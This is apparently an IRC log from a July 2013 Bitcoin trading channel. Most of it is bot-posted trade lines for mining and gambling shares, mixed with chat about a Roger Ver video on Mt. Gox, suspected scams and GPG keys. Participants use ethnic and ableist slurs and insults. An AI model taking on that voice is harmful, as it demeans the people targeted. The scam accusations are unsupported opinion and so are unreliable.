4.39 = 43.9 BTC [+] Jul 17 04:52:50 [BTCTC] [COGNITIVE] 1 @ 0.830001 BTC [-] Jul 17 04:52:52 [BTCTC] [BASIC-MINING] 1 @ 0.8 BTC [+] Jul 17 04:52:55 [BTCTC] [COGNITIVE] 16 @ 0.83 = 13.28 BTC [-] Jul 17 04:53:45 [BTCTC] [COGNITIVE] 14 @ 0.83 = 11.62 BTC [-] Jul 17 04:54:47 [BTCTC] [COGNITIVE] 1 @ 0.917979 BTC [+] Jul 17 04:54:49 [BTCTC] [COGNITIVE] 1 @ 0.917979 BTC [+] Jul 17 04:55:26 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [+] Jul 17 04:56:20 [BTCTC] [ASICMINER-PT] 3 @ 4.395889 = 13.1877 BTC [+] Jul 17 04:56:22 [BTCTC] [ASICMINER-PT] 1 @ 4.39589 BTC [+] Jul 17 04:56:52 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004399 = 0.022 BTC [+] Jul 17 04:57:11 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jul 17 04:58:07 [BTCTC] [TAT.ASICMINER] 25 @ 0.043001 = 1.075 BTC [-] Jul 17 04:58:26 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 17 04:58:31 [BTCTC] [DMS.MINING] 12 @ 0.015 = 0.18 BTC [+] Jul 17 05:00:04 [BTCTC] [PAJKA.BOND] 2 @ 0.049781 = 0.0996 BTC [-] Jul 17 05:00:06 [BTCTC] [PAJKA.BOND] 1 @ 0.049782 BTC [+] Jul 17 05:00:07 [BTCTC] [PAJKA.BOND] 8 @ 0.0499 = 0.3992 BTC [+] Jul 17 05:00:37 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 17 05:00:55 [BTCTC] [AMC-PT] 17 @ 0.0025 = 0.0425 BTC [+] Jul 17 05:01:23 [BTCTC] [AMC-PT] 16 @ 0.0025 = 0.04 BTC [+] Jul 17 05:02:29 [BTCTC] [TAT.ASICMINER] 25 @ 0.043001 = 1.075 BTC [-] Jul 17 05:02:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [-] Jul 17 05:02:41 [HAVELOCK] [AM100] 24 @ 0.041198 = 0.9888 BTC [-] Jul 17 05:02:46 [HAVELOCK] [AM100] 2 @ 0.0412 = 0.0824 BTC [+] Jul 17 05:03:19 [BTCTC] [ASICMINER-PT] 2 @ 4.39589 = 8.7918 BTC [+] Jul 17 05:05:22 [HAVELOCK] [AM100] 48 @ 0.0412 = 1.9776 BTC [+] Jul 17 05:05:23 [HAVELOCK] [AM100] 43 @ 0.04138599 = 1.7796 BTC [+] Jul 17 05:06:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.042395 = 0.212 BTC [-] Jul 17 05:06:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.042395 = 0.212 BTC [-] Jul 17 05:06:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.042394 = 0.4239 BTC [-] Jul 17 05:06:11 [BTCTC] [TAT.ASICMINER] 238 @ 0.042311 = 10.07 BTC [-] Jul 17 05:06:12 [BTCTC] [TAT.ASICMINER] 20 @ 0.04231 = 0.8462 BTC [-] Jul 17 05:06:21 [HAVELOCK] [AM100] 73 @ 0.04138599 = 3.0212 BTC [+] Jul 17 05:06:22 [BTCTC] [TAT.ASICMINER] 7 @ 0.042305 = 0.2961 BTC [-] Jul 17 05:06:24 [HAVELOCK] [AM100] 294 @ 0.04139099 = 12.169 BTC [+] Jul 17 05:06:25 [HAVELOCK] [AM100] 15 @ 0.041392 = 0.6209 BTC [+] Jul 17 05:06:26 [HAVELOCK] [AM100] 10 @ 0.041397 = 0.414 BTC [+] Jul 17 05:06:27 [BTCTC] [TAT.ASICMINER] 49 @ 0.042301 = 2.0727 BTC [-] Jul 17 05:06:28 [HAVELOCK] [AM100] 15 @ 0.041397 = 0.621 BTC [+] Jul 17 05:06:29 [HAVELOCK] [AM100] 10 @ 0.041398 = 0.414 BTC [+] Jul 17 05:06:30 [HAVELOCK] [AM100] 5 @ 0.0415 = 0.2075 BTC [+] Jul 17 05:06:32 [BTCTC] [TAT.ASICMINER] 116 @ 0.0423 = 4.9068 BTC [-] Jul 17 05:06:32 [HAVELOCK] [AM100] 28 @ 0.04159999 = 1.1648 BTC [+] Jul 17 05:09:59 [BTCTC] [AMC-PT] 22 @ 0.0025 = 0.055 BTC [+] Jul 17 05:11:01 [BTCTC] [ASICMINER-PT] 1 @ 4.39589 BTC [+] Jul 17 05:11:03 [BTCTC] [ASICMINER-PT] 1 @ 4.395897 BTC [+] Jul 17 05:11:05 [BTCTC] [ASICMINER-PT] 1 @ 4.395898 BTC [+] Jul 17 05:11:11 [BTCTC] [ASICMINER-PT] 5 @ 4.4 = 22 BTC [+] Jul 17 05:11:23 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 17 05:13:13 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 17 05:13:44 [HAVELOCK] [SDICE] 6 @ 0.239 = 1.434 BTC [-] Jul 17 05:13:47 [BTCTC] [AMC-PT] 38 @ 0.0025 = 0.095 BTC [+] Jul 17 05:14:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004341 BTC [-] Jul 17 05:15:17 [BTCTC] [ASICMINER-PT] 4 @ 4.4 = 17.6 BTC [+] Jul 17 05:15:18 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0043 = 0.043 BTC [-] Jul 17 05:15:27 [BTCTC] [ASICMINER-PT] 1 @ 4.441 BTC [+] Jul 17 05:15:41 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0041 = 0.0205 BTC [-] Jul 17 05:16:05 [BTCTC] [ASICMINER-PT] 5 @ 4.447995 = 22.24 BTC [+] Jul 17 05:19:16 [BTCTC] [BASIC-MINING] 1 @ 0.76 BTC [-] Jul 17 05:22:33 [BTCTC] [ASICMINER-PT] 1 @ 4.447 BTC [-] Jul 17 05:23:46 [HAVELOCK] [SDSTM] 10 @ 0.0119 = 0.119 BTC [+] Jul 17 05:28:27 [BTCTC] [CRYPTO-TRADE] 6 @ 0.19999 = 1.1999 BTC [+] Jul 17 05:30:30 [BTCTC] [BASIC-MINING] 2 @ 0.799 = 1.598 BTC [+] Jul 17 05:33:39 [BTCTC] [TAT.ASICMINER] 19 @ 0.042401 = 0.8056 BTC [+] Jul 17 05:33:51 [BTCTC] [TAT.ASICMINER] 31 @ 0.042401 = 1.3144 BTC [+] Jul 17 05:33:53 [BTCTC] [TAT.ASICMINER] 98 @ 0.0424 = 4.1552 BTC [-] Jul 17 05:34:20 [BTCTC] [BASIC-MINING] 1 @ 0.8 BTC [+] Jul 17 05:35:52 [BTCTC] [BTC-BOND] 3 @ 0.009995 = 0.03 BTC [-] Jul 17 05:39:40 [MPEX] [S.MPOE] 2535 @ 0.00092792 = 2.3523 BTC [-] Jul 17 05:39:42 [MPEX] [S.MPOE] 7219 @ 0.00092952 = 6.7102 BTC [+] Jul 17 05:40:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.043376 = 0.1301 BTC [+] Jul 17 05:41:49 [BTCTC] [S.DICE-PT] 53 @ 0.002357 = 0.1249 BTC [+] Jul 17 05:42:04 [BTCTC] [BASIC-MINING] 1 @ 0.8 BTC [+] Jul 17 05:43:37 [BTCTC] [AMC-PT] 37000 @ 0.0025 = 92.5 BTC [+] Jul 17 05:44:44 [HAVELOCK] [AM100] 4 @ 0.041 = 0.164 BTC [-] Jul 17 05:45:59 [BTCTC] [AMC-PT] 125 @ 0.0025 = 0.3125 BTC [+] Jul 17 05:46:43 [BTCTC] [COGNITIVE] 1 @ 0.870001 BTC [-] Jul 17 05:46:45 [BTCTC] [COGNITIVE] 3 @ 0.87 = 2.61 BTC [-] Jul 17 05:48:12 [BTCTC] [S.DICE-PT] 29 @ 0.002357 = 0.0684 BTC [+] Jul 17 05:48:27 [BTCTC] [S.DICE-PT] 5 @ 0.002357 = 0.0118 BTC [+] Jul 17 05:48:29 [BTCTC] [S.DICE-PT] 100 @ 0.002357 = 0.2357 BTC [+] Jul 17 05:48:30 [BTCTC] [S.DICE-PT] 10 @ 0.002358 = 0.0236 BTC [+] Jul 17 05:48:32 [BTCTC] [S.DICE-PT] 100 @ 0.002358 = 0.2358 BTC [+] Jul 17 05:49:15 [BTCTC] [BASIC-MINING] 1 @ 0.799 BTC [-] Jul 17 05:49:49 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004101 = 0.4101 BTC [+] Jul 17 05:53:27 [HAVELOCK] [AM100] 121 @ 0.041 = 4.961 BTC [-] Jul 17 05:53:33 [BTCTC] [COGNITIVE] 1 @ 0.917977 BTC [+] Jul 17 05:53:33 [HAVELOCK] [AM100] 2 @ 0.041 = 0.082 BTC [-] Jul 17 05:54:33 [BTCTC] [BFMINES] 31 @ 0.00399 = 0.1237 BTC [+] Jul 17 05:55:08 [BTCTC] [TAT.ASICMINER] 18 @ 0.043359 = 0.7805 BTC [-] Jul 17 05:59:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.04241 = 0.4241 BTC [-] Jul 17 06:02:04 [BTCTC] [DMS.PURCHASE] 4 @ 0.03772 = 0.1509 BTC [-] Jul 17 06:02:57 [BTCTC] [AMC-PT] 60 @ 0.0025 = 0.15 BTC [+] Jul 17 06:03:42 [BTCTC] [TAT.ASICMINER] 22 @ 0.04241 = 0.933 BTC [-] Jul 17 06:08:32 [MPEX] [S.MPOE] 4450 @ 0.00093072 = 4.1417 BTC [+] Jul 17 06:10:00 [BTCTC] [DMS.MINING] 5 @ 0.0153 = 0.0765 BTC [+] Jul 17 06:10:40 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 17 06:12:07 [BTCTC] [TAT.ASICMINER] 37 @ 0.04265 = 1.5781 BTC [+] Jul 17 06:14:24 [HAVELOCK] [SDICE] 4 @ 0.239 = 0.956 BTC [-] Jul 17 06:14:32 [BTCTC] [ASICMINER-PT] 1 @ 4.445 BTC [-] Jul 17 06:15:29 [BTCTC] [ASICMINER-PT] 2 @ 4.445 = 8.89 BTC [-] Jul 17 06:15:53 [HAVELOCK] [AM100] 20 @ 0.041599 = 0.832 BTC [+] Jul 17 06:16:07 [HAVELOCK] [AM100] 3 @ 0.041599 = 0.1248 BTC [+] Jul 17 06:18:35 [HAVELOCK] [SDSTM] 20 @ 0.0119 = 0.238 BTC [+] Jul 17 06:19:32 [BTCTC] [BASIC-MINING] 1 @ 0.8 BTC [+] Jul 17 06:20:02 of course my administrator has restricted this, why would I need more than two weeks worth of calendar synced to my phone! Jul 17 06:20:53 maybe this is your notice Jul 17 06:21:34 im quietly hoping that is true Jul 17 06:23:08 [BTCTC] [ASICMINER-PT] 2 @ 4.401002 = 8.802 BTC [-] Jul 17 06:24:39 [BTCTC] [BASIC-MINING] 2 @ 0.8 = 1.6 BTC [+] Jul 17 06:30:33 [BTCTC] [ASICMINER-PT] 1 @ 4.401001 BTC [-] Jul 17 06:30:35 [BTCTC] [ASICMINER-PT] 1 @ 4.401 BTC [-] Jul 17 06:31:09 [BTCTC] [BASIC-MINING] 3 @ 0.8 = 2.4 BTC [+] Jul 17 06:33:53 [HAVELOCK] [AM100] 1 @ 0.041598 BTC [-] Jul 17 06:34:05 lol Jul 17 06:37:16 [BTCTC] [ASICMINER-PT] 2 @ 4.400003 = 8.8 BTC [-] Jul 17 06:37:18 [BTCTC] [ASICMINER-PT] 2 @ 4.400002 = 8.8 BTC [-] Jul 17 06:38:13 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [+] Jul 17 06:41:33 [HAVELOCK] [KCIM] 1 @ 0.9 BTC [+] Jul 17 06:42:03 [BTCTC] [AMC-PT] 3175 @ 0.0025 = 7.9375 BTC [+] Jul 17 06:44:49 [BTCTC] [DMS.SELLING] 8 @ 0.024489 = 0.1959 BTC [+] Jul 17 06:45:34 [HAVELOCK] [AM100] 63 @ 0.041598 = 2.6207 BTC [-] Jul 17 06:49:40 [HAVELOCK] [AM100] 20 @ 0.041598 = 0.832 BTC [-] Jul 17 06:52:30 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 17 06:56:25 [BTCTC] [GSDPT] 44 @ 0.0021 = 0.0924 BTC [+] Jul 17 07:06:34 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 17 07:07:46 [HAVELOCK] [SDSTM] 6 @ 0.012 = 0.072 BTC [+] Jul 17 07:12:39 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0041 = 0.0205 BTC [-] Jul 17 07:12:42 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.004 = 0.028 BTC [-] Jul 17 07:12:44 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004 = 0.02 BTC [-] Jul 17 07:12:46 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.004 = 0.076 BTC [-] Jul 17 07:17:14 [BTCTC] [AMC-PT] 620 @ 0.0025 = 1.55 BTC [+] Jul 17 07:22:23 [BTCTC] [BTC-BOND] 6 @ 0.009995 = 0.06 BTC [-] Jul 17 07:27:58 [BTCTC] [ASICMINER-PT] 1 @ 4.360035 BTC [-] Jul 17 07:36:13 [MPEX] [S.MPOE] 10180 @ 0.00092957 = 9.463 BTC [-] Jul 17 07:36:50 [BTCTC] [BASIC-MINING] 1 @ 0.79 BTC [-] Jul 17 07:38:02 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 17 07:40:28 [BTCTC] [S.DICE-PT] 1 @ 0.002358 BTC [+] Jul 17 07:40:30 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19501 BTC [-] Jul 17 07:41:07 [BTCTC] [DMS.MINING] 10 @ 0.0145 = 0.145 BTC [-] Jul 17 07:41:09 [BTCTC] [DMS.MINING] 9 @ 0.0145 = 0.1305 BTC [-] Jul 17 07:41:30 [BTCTC] [BASIC-MINING] 1 @ 0.799 BTC [+] Jul 17 07:41:32 [BTCTC] [BASIC-MINING] 2 @ 0.799 = 1.598 BTC [+] Jul 17 07:42:21 [BTCTC] [COGNITIVE] 1 @ 0.917974 BTC [-] Jul 17 07:42:57 [BTCTC] [COGNITIVE] 10 @ 0.917975 = 9.1798 BTC [+] Jul 17 07:47:30 [BTCTC] [BASIC-MINING] 1 @ 0.799 BTC [+] Jul 17 07:51:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.043299 = 0.0866 BTC [+] Jul 17 07:51:49 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 17 07:56:19 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 17 07:58:39 [BTCTC] [LTC-ATF.B2] 1 @ 0.0102 BTC [+] Jul 17 07:58:41 [BTCTC] [LTC-ATF.B2] 25 @ 0.010101 = 0.2525 BTC [-] Jul 17 07:58:43 [BTCTC] [LTC-ATF.B2] 2 @ 0.0101 = 0.0202 BTC [-] Jul 17 07:58:45 [BTCTC] [LTC-ATF.B2] 45 @ 0.010062 = 0.4528 BTC [-] Jul 17 07:58:47 [BTCTC] [LTC-ATF.B2] 277 @ 0.010061 = 2.7869 BTC [-] Jul 17 08:00:51 [BTCTC] [ASICMINER-PT] 4 @ 4.370029 = 17.4801 BTC [+] **** BEGIN LOGGING AT Wed Jul 17 20:13:13 2013 Jul 17 20:13:32 don't agree with it Jul 17 20:13:51 mircea_popescu: here have some lulz: http://www.youtube.com/watch?v=UP1YsMlrfF0 Jul 17 20:14:35 lol Jul 17 20:14:43 all these people that recently took speaking classes Jul 17 20:14:50 why is he chewing these words!!! Jul 17 20:15:13 wait i need to make a photochop Jul 17 20:15:26 it's unavailable Jul 17 20:15:41 [BTCTC] [BTC-BOND] 4 @ 0.009995 = 0.04 BTC [-] Jul 17 20:15:48 he took it down Jul 17 20:16:12 jcpham, still up for me Jul 17 20:16:20 not for me Jul 17 20:16:37 so basically ver aspires to be luke ? Jul 17 20:17:11 i should've watched it 30 minutes ago when i opened it the first time Jul 17 20:17:54 jcpham are you sure you're not missing the 0 at the end ? Jul 17 20:19:24 i think i'm doing it right, yes Jul 17 20:19:36 odd Jul 17 20:19:44 [BTCTC] [AMC-PT] 3850 @ 0.002499 = 9.6212 BTC [+] Jul 17 20:19:46 my internets may be busted Jul 17 20:19:47 [BTCTC] [AMC-PT] 150 @ 0.002499 = 0.3749 BTC [+] Jul 17 20:19:50 really odd Jul 17 20:20:01 i've taken a screenshot of this for posterity just in case Jul 17 20:20:07 maybe you're in china. Jul 17 20:20:17 won't surprise me if he does though Jul 17 20:20:45 why ? just because he's read an exclamation point after every vowel ? Jul 17 20:21:39 nope, it's pretty obvious the video does exactly the opposite of what it was meant for Jul 17 20:22:02 so i'm guessing it is supposed to be a video of bitcoin jesus reassuring everyone Jul 17 20:22:03 you mean obvious to him and his fatass friend, Jul 17 20:22:06 or obvious to like, people. Jul 17 20:22:19 but the comments make it seem disingenuous Jul 17 20:22:49 roger ver is reassuring everyone that gox is still solvent Jul 17 20:22:52 when they may not be Jul 17 20:22:57 is that the gist Jul 17 20:23:01 if it were to the fatass Karpeles it won't even be online, i imagined he reviewed it Jul 17 20:23:16 hey now.. karpeles just happens to enjoy food Jul 17 20:23:18 jcpham yes Jul 17 20:23:23 k Jul 17 20:23:29 https://twitter.com/Mircea_Popescu/status/357551034039681024 Jul 17 20:23:31 Twitter / Mircea_Popescu: So basically @rogerkver 's ... Jul 17 20:23:33 that's the jist jcpham Jul 17 20:23:52 maybe my proxy is down Jul 17 20:23:56 twitter is fail too Jul 17 20:23:57 http://imgur.com/VFRgdHQ there it is Jul 17 20:23:59 imgur: the simple image sharer Jul 17 20:24:04 how the fuck am i talking then Jul 17 20:24:23 MemoryDealers Jul 17 20:24:25 I made this video voluntarily, and free of coercion. I did spend about 5 minutes in advance, writing down what I wanted to say. I then read it from my own script for this video. Jul 17 20:24:28 lol Jul 17 20:24:44 had to make sure to use a golden gun Jul 17 20:24:54 i advise people to record voicemail and telephone prompts from script Jul 17 20:25:09 not so much with video Jul 17 20:25:58 http://i.imgur.com/1MlPWvA.png Jul 17 20:26:11 ragehammerkeyboard Jul 17 20:26:22 TAT, the face you chose is priceless, i see real conviction in there Jul 17 20:26:33 jcpham prolly your dns fucked up, and the connection here is already resolved and kept alive Jul 17 20:26:53 ThickAsThieves lol Jul 17 20:26:58 network solution dns is being attacked today Jul 17 20:27:03 that shouldn't effect me Jul 17 20:27:18 hrm Jul 17 20:27:24 [HAVELOCK] [AM100] 100 @ 0.0412 = 4.12 BTC [-] Jul 17 20:27:26 [BTCTC] [COGNITIVE] 1 @ 0.975001 BTC [-] Jul 17 20:27:27 [BTCTC] [COGNITIVE] 5 @ 0.975 = 4.875 BTC [-] Jul 17 20:28:03 [HAVELOCK] [AM100] 500 @ 0.0415 = 20.75 BTC [+] Jul 17 20:28:13 can't believe you guys are doubting the words of bitcoin jesus Jul 17 20:29:05 oh theres a reddit thread too Jul 17 20:29:31 [BTCTC] [COGNITIVE] 4 @ 0.97 = 3.88 BTC [-] Jul 17 20:29:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.042798 BTC [-] Jul 17 20:30:51 reddit shall be fine i'm sure. that's pretty much where the people too retarded to hang on sa go. Jul 17 20:31:19 ThickAsThieves you know, the hand on the golden gun is not nearly fat enough Jul 17 20:31:24 in fact it looks almost female. Jul 17 20:31:34 it is Jul 17 20:31:36 sorry Jul 17 20:31:55 [BTCTC] [AMC-PT] 100 @ 0.002499 = 0.2499 BTC [+] Jul 17 20:31:57 it's his wife? Jul 17 20:32:38 [BTCTC] [DMS.PURCHASE] 1 @ 0.039759 BTC [-] Jul 17 20:33:05 [BTCTC] [AMC-PT] 10 @ 0.002499 = 0.025 BTC [+] Jul 17 20:33:05 maybe iy could be his mom. Jul 17 20:33:24 http://www.bbc.co.uk/news/business-23348641 Jul 17 20:33:27 BBC News - Federal Reserve's Ben Bernanke aims to reassure markets Jul 17 20:33:36 lol Jul 17 20:33:41 What a criminal Jul 17 20:33:51 Mr Bernanke said the end to easy money was not on a "preset course." Jul 17 20:34:05 or for that matter, a practicable one. Jul 17 20:34:14 "I'm not qualified to respond as a financial adviser," Mr Bernanke joked Jul 17 20:34:40 qualified Jul 17 20:37:54 [BTCTC] [GSDPT] 19 @ 0.002045 = 0.0389 BTC [-] Jul 17 20:37:57 [HAVELOCK] [SDSTM] 1 @ 0.011 BTC [+] Jul 17 20:38:12 "Though I have a lot of issues with BFL, I do think they will deliver *eventually*." Jul 17 20:38:18 why do people still think tht? Jul 17 20:39:12 [BTCTC] [GSDPT] 1 @ 0.002045 BTC [-] Jul 17 20:39:28 [BTCTC] [DMS.PURCHASE] 1 @ 0.039759 BTC [-] Jul 17 20:40:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.042795 BTC [-] Jul 17 20:42:05 [HAVELOCK] [AM100] 18 @ 0.0416 = 0.7488 BTC [+] Jul 17 20:42:18 [HAVELOCK] [AM100] 5 @ 0.0416 = 0.208 BTC [+] Jul 17 20:42:30 [HAVELOCK] [AM100] 24 @ 0.0416 = 0.9984 BTC [+] Jul 17 20:42:33 [BTCTC] [BTC-BOND] 755 @ 0.009996 = 7.547 BTC [+] Jul 17 20:42:44 [HAVELOCK] [AM100] 1 @ 0.0416054 BTC [+] Jul 17 20:42:50 [HAVELOCK] [AM100] 2 @ 0.041788 = 0.0836 BTC [+] Jul 17 20:42:59 [HAVELOCK] [AM100] 1 @ 0.041788 BTC [+] Jul 17 20:43:07 [HAVELOCK] [AM100] 2 @ 0.041788 = 0.0836 BTC [+] Jul 17 20:43:13 [BTCTC] [AMC-PT] 817 @ 0.002499 = 2.0417 BTC [+] Jul 17 20:43:15 [BTCTC] [AMC-PT] 2683 @ 0.0025 = 6.7075 BTC [+] Jul 17 20:43:20 [HAVELOCK] [AM100] 1 @ 0.041788 BTC [+] Jul 17 20:43:28 [HAVELOCK] [AM100] 2 @ 0.041789 = 0.0836 BTC [+] Jul 17 20:43:34 [HAVELOCK] [AM100] 1 @ 0.04178999 BTC [+] Jul 17 20:43:54 TAT, cause that's people, they 're hoping even when faced with facts it won't happen Jul 17 20:44:38 [HAVELOCK] [AM100] 1 @ 0.041796 BTC [+] Jul 17 20:45:01 ThickAsThieves> why do people still think tht? << because the alternative would be "I was stupid" Jul 17 20:45:04 [HAVELOCK] [AM100] 5 @ 0.041797 = 0.209 BTC [+] Jul 17 20:45:15 [HAVELOCK] [AM100] 5 @ 0.0419 = 0.2095 BTC [+] Jul 17 20:45:23 this is how you tell who's stupid : he who shudders at even the vaguest hint he might at some point have been stupid, Jul 17 20:45:25 that's the stupid. Jul 17 20:45:44 [HAVELOCK] [AM100] 3 @ 0.042 = 0.126 BTC [+] Jul 17 20:45:57 [HAVELOCK] [AM100] 5 @ 0.042 = 0.21 BTC [+] Jul 17 20:46:17 [HAVELOCK] [AM100] 20 @ 0.042 = 0.84 BTC [+] Jul 17 20:46:19 [HAVELOCK] [AM100] 4 @ 0.042 = 0.168 BTC [+] Jul 17 20:46:46 [MPEX] [S.MPOE] 3350 @ 0.00088185 = 2.9542 BTC [+] Jul 17 20:46:50 [BTCTC] [TAT.ASICMINER] 15 @ 0.042795 = 0.6419 BTC [-] Jul 17 20:47:08 I think they could eventually as well, that also doesn't mean anytime soon Jul 17 20:47:23 I think by the time I get my 3 singles, they will be worthless Jul 17 20:47:42 where does stupid keep getting so much money from Jul 17 20:47:50 ThickAsThieves welfare governments Jul 17 20:47:53 this is why we hate them. Jul 17 20:47:56 LabRatMining has like 1700btc in sales today Jul 17 20:48:16 making it so "nobody is hungry" results in every idiot having a lot of money and then throwing it away to enact a tyrrany of scammers and britney spears. Jul 17 20:48:37 hey, at least britney spears is cute Jul 17 20:48:47 is? Jul 17 20:48:47 i think she was cutest in south park. Jul 17 20:48:50 for trailer trash Jul 17 20:49:13 as to firm numbers : i'll bet you more than none of that purported 1700 is labrat mining itself. Jul 17 20:49:15 lol the south park episode, Paris Hilton was better Jul 17 20:49:21 [BTCTC] [DMS.MINING] 4 @ 0.0159 = 0.0636 BTC [-] Jul 17 20:49:28 Rulother and so was the wetback chick whatever her name is Jul 17 20:49:29 they say a foll and his money are soon parted, but we just keep giving the fools more money Jul 17 20:49:34 *fool Jul 17 20:49:41 O man, J-lo Jul 17 20:49:45 it's pretty funny when cutout renditions of "celebrities" are better than the real deal. Jul 17 20:49:48 Cartman's hand... wonderful Jul 17 20:50:09 who is labrat, and why should we trust them? Jul 17 20:50:24 some BFL forum moderator Jul 17 20:50:26 labrat sounds like pretty advanced scammers by now. Jul 17 20:50:33 and i dont know why anyone would trust them Jul 17 20:50:37 I should just install irc on my work computer, not being able to pm through the webportal is eh Jul 17 20:50:39 you should trust them because they support your own mistaken ideas about the world Jul 17 20:50:50 (ie, that scientists are less than you, what with being rats and all) Jul 17 20:51:26 this one is good because he's not even taking a % Jul 17 20:51:34 [HAVELOCK] [SDSTM] 2 @ 0.011 = 0.022 BTC [+] Jul 17 20:51:36 isn't Bugpowder a scientist? Jul 17 20:51:39 or something Jul 17 20:51:41 then what is his incentive to not scam? Jul 17 20:51:51 thestringpuller, would surprise me Jul 17 20:51:52 I'm a scientist (chemist) Jul 17 20:51:58 thestringpuller!*@* added to ignore list. Jul 17 20:52:10 bugpowder does things to rats in a lab afaik Jul 17 20:53:16 in other news, i'm getting artists to create gpg keys and at an incredible rate. Jul 17 20:53:23 pretty soon they'll like be on bitcoin and shit. Jul 17 20:53:31 [BTCTC] [S.DICE-PT] 1 @ 0.002408 BTC [+] Jul 17 20:53:54 "to create gpg keys and at an incredible rate." what's the point ? Jul 17 20:54:05 getting non-techies to comply Jul 17 20:54:13 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 17 20:54:16 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 17 20:54:21 Apocalyptic about 500 years ago having a signature is what made you human. Jul 17 20:54:25 women didn't have the right to sign Jul 17 20:54:33 today, the masses are in the exact situation, the signature is gpg. Jul 17 20:54:47 getting more bipedals to be people is just that, the good work. Jul 17 20:55:03 good job making more people human! Jul 17 20:55:15 aren't i something grand. Jul 17 20:56:17 09:48:45 mircea_popescu_ ;;gpg register mircea_popescu 2FB7B452 Jul 17 20:56:17 09:48:45 gribble Error: ‘2FB7B452′ is not a valid GPG key id. Jul 17 20:56:22 you are a modern day sojourner truth Jul 17 20:56:25 mp was once an ape Jul 17 20:56:33 everyone's born one! Jul 17 20:56:36 :) Jul 17 20:57:02 [MPEX] [S.DICE] 800 @ 0.00205 = 1.64 BTC [+] Jul 17 20:57:04 [MPEX] [S.DICE] 9350 @ 0.002001 = 18.7094 BTC [-] Jul 17 20:57:10 [MPEX] [S.DICE] 400 @ 0.0020001 = 0.8 BTC [-] Jul 17 20:57:12 [MPEX] [S.DICE] 489450 @ 0.002 = 978.9 BTC [-] Jul 17 20:57:19 ThickAsThieves http://trilema.com/2013/15th-blown-other-statements/#comment-93968 Jul 17 20:57:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.04279 BTC [-] Jul 17 20:57:25 there, conditional ssws now! Jul 17 20:57:36 teh complexity doth grow. Jul 17 20:58:33 nice Jul 17 20:58:37 is that nubbins? Jul 17 20:58:58 no, it's actually a woman Jul 17 20:59:16 word Jul 17 20:59:22 [12:39] <@assbot> [MPEX] [S.MG] 10000 @ 0.00023 = 2.3 BTC [+] you see that? Jul 17 20:59:29 or so i think Jul 17 20:59:37 eh no i hadn't. Jul 17 20:59:51 so if i do actually release this thing what, 0.005 ? Jul 17 20:59:56 [HAVELOCK] [AM100] 69 @ 0.042 = 2.898 BTC [+] Jul 17 21:00:13 who knows Jul 17 21:00:41 if garbage gets 2000btc in a day Jul 17 21:00:48 real shit gets what? Jul 17 21:00:55 i don't think hat's reasonable. Jul 17 21:01:03 real shit ideally gets something reasonable. Jul 17 21:01:10 Ouch, big S.DICE selloff. Jul 17 21:01:20 [BTCTC] [S.BBET-PT] 2 @ 0.002 = 0.004 BTC [-] Jul 17 21:01:22 It's been a while Jul 17 21:01:26 [HAVELOCK] [AM100] 23 @ 0.042 = 0.966 BTC [+] Jul 17 21:01:51 !t m s.bbet Jul 17 21:01:52 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0005505 / 0.00055905 / 0.00056 (20000 shares, 11.18 BTC), 30D: 0.0005505 / 0.00059469 / 0.00085 (24200 shares, 14.39 BTC) Jul 17 21:01:53 i think S.MG price would stay calm if more people would sell, but we wanna see what happens Jul 17 21:02:05 bitbet is 0.0005 on mpex and 0.004 on btctc ? Jul 17 21:02:10 or is the pw 10:1 ? Jul 17 21:02:43 1:1 Jul 17 21:03:01 well that makes sense then. Jul 17 21:03:13 It always makes sense... Jul 17 21:03:39 [BTCTC] [BASIC-MINING] 1 @ 0.759 BTC [+] Jul 17 21:03:46 slow rolling that arb? Jul 17 21:03:59 building a nice swampy foundation? Jul 17 21:04:18 [HAVELOCK] [AM100] 4 @ 0.042 = 0.168 BTC [+] Jul 17 21:04:19 [HAVELOCK] [AM100] 20 @ 0.042 = 0.84 BTC [+] Jul 17 21:04:37 [BTCTC] [TAT.ASICMINER] 39 @ 0.041953 = 1.6362 BTC [-] Jul 17 21:04:59 acrtually pascale could as well be a man's name no ? Jul 17 21:05:01 maybe it IS nubbins Jul 17 21:05:15 [BTCTC] [S.BBET-PT] 98 @ 0.002 = 0.196 BTC [-] Jul 17 21:05:17 [BTCTC] [S.BBET-PT] 40 @ 0.0019 = 0.076 BTC [-] Jul 17 21:05:19 